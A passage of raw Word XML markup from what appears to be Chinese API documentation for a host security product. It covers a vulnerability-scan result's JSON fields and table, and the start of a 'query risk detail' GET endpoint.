      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "所有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>范围"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "qingteng.qingteng.cn",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5b3a8b567d761b22befc8e16",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT032016001411",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C8200"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694"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3236B04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4B405D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595068F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD78220" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A800E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DC96A07" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7716377C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A5B951F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16749085" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10D8F205" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69329546" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F581EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F867D2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="657CE889" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F1AAD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07935AF4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5495829C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C06EE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F6B00F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6710B8ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4AB63FF9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1509F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="312C6C4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10438D75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A967FEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6FCCFB4E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CC118FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E85A1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD5A07D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307ABDB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2019ED19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D1D9C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E9C2CE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4873D863" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F411D9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C87365C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA9A27D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FCB570D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06D745B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B998B71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32E3CAFB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A3D25C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66DE8879" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0226739C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="182DDF7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42B01E32" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67EEC05E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D56D766" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17924A8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62431601" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16E21433" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79834B56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CEE2704" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175B9933" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3010FDB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30E9C9AE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A2D9D46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F781D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C3CCEE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D942F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05775A2C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13EADF8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348EAE57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C30716" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F3BBC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23CAF399" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ECB0926" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E2AD55D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C483378" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68EB3E89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单(true/false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BF008A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc115166171"/>
      <w:bookmarkStart w:id="194" w:name="查询风险详情-1"/>
      <w:bookmarkEnd w:id="192"/>
      <w:r>
        <w:t>查询风险详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="0288C0DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535BC217" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app|system|access|account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0231C41A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3CD876" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48F77F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B7856" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5b3a8b567d761b22befc8e16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5453BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211D1AA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
